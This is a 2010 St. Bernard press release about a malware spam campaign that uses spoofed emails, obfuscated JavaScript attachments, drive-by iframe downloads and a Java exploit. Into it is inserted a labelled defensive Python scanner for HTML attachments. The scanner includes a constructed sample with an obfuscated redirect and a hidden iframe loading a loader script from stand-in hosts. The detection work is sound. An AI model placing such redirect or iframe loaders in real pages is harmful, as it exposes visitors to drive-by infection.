SOURCE: St. Bernard

St. Bernard

September 20, 2010 18:43 ET

St. Bernard's Red Condor Security Team Warns of Resurgence of Aggressive Plug-and-Play Malware Campaign

St. Bernard's Red Condor Blocks Millions of Template-Based Spoofed and Misdirected Personal Emails as PNP Spammers Once Again Pick up the Pace

SAN DIEGO, CA--(Marketwire - September 20, 2010) -  After nearly two weeks of dormancy, spammers associated with the recent string of plug-and-play (PNP) malware campaigns have once again returned in force, distributing millions of new virulent messages that use what appear to be stolen emails as templates, alongside brand spoofs. St. Bernard's Red Condor (OTCBB: SBSW) security team today issued a warning of the campaigns after the company blocked more than 8 million messages since the middle of last week. The cyber-criminals, who have actively spoofed major brands including Amazon, eBay, Facebook and WordPress, are also using "misdirected" personal email as templates.

"Like the global 'Here you have...' spam campaign from earlier this month, this new round of PNP spam is virulent and relies on social engineering to get users to click on a link or open an attachment, but that is where the similarities end," said Mary Mizrahi, product manager at St. Bernard. "The PNP spam is much more sophisticated and more dangerous than the 'Here You Have...' campaign, which did not cause any harm to computers. From a single click on a link in the PNP email message, multiple exploits can silently infect a computer system in a matter of seconds."

Mizrahi added, "The PNP campaigns also are employing a second phase, which uses social engineering trickery to convince users to download and install what could be a cocktail of malware. Among the malware appears to be rootkits that can be used to plant keyloggers, sniff banking credentials and perform other nefarious activities, which are much bigger threats than simply turning a computer into a spam-spewing machine as the 'Here you have...' campaign attempted to do."

The cyber-criminals behind the PNP malware campaigns continue to evolve their methods for bypassing filters and convincing users to click on a link or open an attachment in an email. The scammers also appear to have switched from their own obfuscation techniques for the JavaScript sent through email to commercially available tools such as AntsSoft HTML Protector, a product designed to prevent certain actions on web pages, such as right-clicking.

If a recipient opens the HTML attachment in the spam emails, the embedded JavaScript causes the browser to navigate to the compromised host, which then performs a silent drive-by download (iframe technique) of more obfuscated JavaScript. The additional script attempts several exploits and shuttles the browser to another fake anti-virus site, similar to the sites reported in August 2010. The JavaScript obfuscation technique for the downloader component of this campaign has been completely revamped, and the downloader attempts to exploit CVE-2010-0886, a vulnerability in the Java Development Toolkit, as well as pulling down several other virulent components, including "installer_m.exe," "flash.swf" and "libtiff.pdf." A VirusTotal scan of the multiple malicious components contained in the downloader found that none of the virus engines had detected installer_m.exe, 12 had identified flash.swf as a Trojan, and five had detected libtiff.pdf.
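As an added, defender-side example (not code from St. Bernard or Red Condor): a heuristic scanner for HTML email attachments that flags the three hallmarks of the chain described above, namely embedded JavaScript that navigates the browser elsewhere, a hidden iframe, and obfuscation markers such as eval/unescape over percent-encoded strings. The sample attachment, its script and its hostnames are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample of an HTML attachment of the kind described above (not a real
# campaign sample): an obfuscated script that navigates away, plus a hidden iframe.
SAMPLE_ATTACHMENT = """<html><body>
<p>Your order #12345 has shipped. See details below.</p>
<script>eval(unescape('%77%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%3d%22http://example.invalid/x%22'));</script>
<iframe src="http://compromised.example.invalid/ldr.php" width="0" height="0" style="display:none"></iframe>
</body></html>"""

NAV_RE = re.compile(r"(window\.|document\.)?location(\.href|\.replace)?\s*[=(]", re.I)
OBF_RE = re.compile(r"\b(eval|unescape|String\.fromCharCode)\s*\(", re.I)
ESC_RE = re.compile(r"(%[0-9a-f]{2}){8,}|(\\x[0-9a-f]{2}){8,}", re.I)  # long escaped runs

class _Collector(HTMLParser):
    """Collect script bodies, iframes and meta-refresh tags from the attachment."""
    def __init__(self):
        super().__init__()
        self.scripts, self.iframes, self.meta_refresh, self._in_script = [], [], [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            self.iframes.append(a)
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.meta_refresh.append(a.get("content") or "")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def _hidden(iframe):
    style = (iframe.get("style") or "").replace(" ", "").lower()
    return (iframe.get("width") == "0" or iframe.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style)

def scan_html_attachment(html):
    """Return which of the three indicators the attachment shows."""
    c = _Collector(); c.feed(html)
    js = "\n".join(c.scripts)
    # Decode percent-escapes once so navigation hidden behind unescape() is visible too.
    decoded = js + "\n" + re.sub(r"%([0-9a-f]{2})", lambda m: chr(int(m.group(1), 16)), js, flags=re.I)
    return {"js_navigation": bool(NAV_RE.search(decoded)) or bool(c.meta_refresh),
            "hidden_iframe": any(_hidden(f) for f in c.iframes),
            "obfuscated_js": bool(OBF_RE.search(js)) or bool(ESC_RE.search(js))}

def should_quarantine(html):
    """Quarantine when at least two of the three indicators are present."""
    return sum(scan_html_attachment(html).values()) >= 2
```

A single indicator (an obfuscated script alone, say) is common in legitimate marketing mail, which is why the quarantine decision requires two of the three.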

Visit St. Bernard's Red Condor Security Alerts blog for more details on PNP malware.

About St. Bernard Software
St. Bernard Software develops and markets Internet security appliances and services that empower IT professionals to effectively, efficiently and intelligently manage their enterprise's Internet-based resources. Originally founded in 1995 as a market-leader in data security with its flagship product, Open File Manager™, the company is now recognized for delivering today's #1 Web filtering and security appliance, iPrism®. With millions of end users worldwide in more than 5,000 enterprises, educational institutions, SMB, and government agencies, St. Bernard strives to deliver simple, high performance solutions that offer excellent value to our customers.

Based in San Diego, California, St. Bernard (OTCBB: SBSW) markets its solutions through a network of value-added resellers, distributors, system integrators, OEM partners and directly to end users. For more information about St. Bernard Software, visit www.stbernard.com.

About Red Condor
Now part of St. Bernard, Red Condor's highly accurate email filter Vx Technology™ hybrid architecture and fully managed appliances lead to a dramatic reduction in the cost of owning a premium spam filter. With email security solutions for small-to-medium businesses, as well as for ISPs with millions of email inboxes, Red Condor is rapidly gaining market share. The company's email security system has built-in zero tolerance for lost email, and a near zero false-positive rate, with spam block rates that exceed 99%. Red Condor Archive is a secure message archiving service with lifetime retention and unlimited storage. The company's award-winning technology is backed 24/7 by a team of human email security experts monitoring for the latest email threats. For more information, visit www.redcondor.com.

©2010 St. Bernard Software Inc. All rights reserved. The St. Bernard Software logo, iPrism, iGuard, the Red Condor Logo, and Vx Technology are trademarks of St. Bernard Software Inc. All other trademarks and registered trademarks are hereby acknowledged.

Contact Information

  • Media contact:
    Lorrie Hunsaker
    St. Bernard
    (858) 524-2041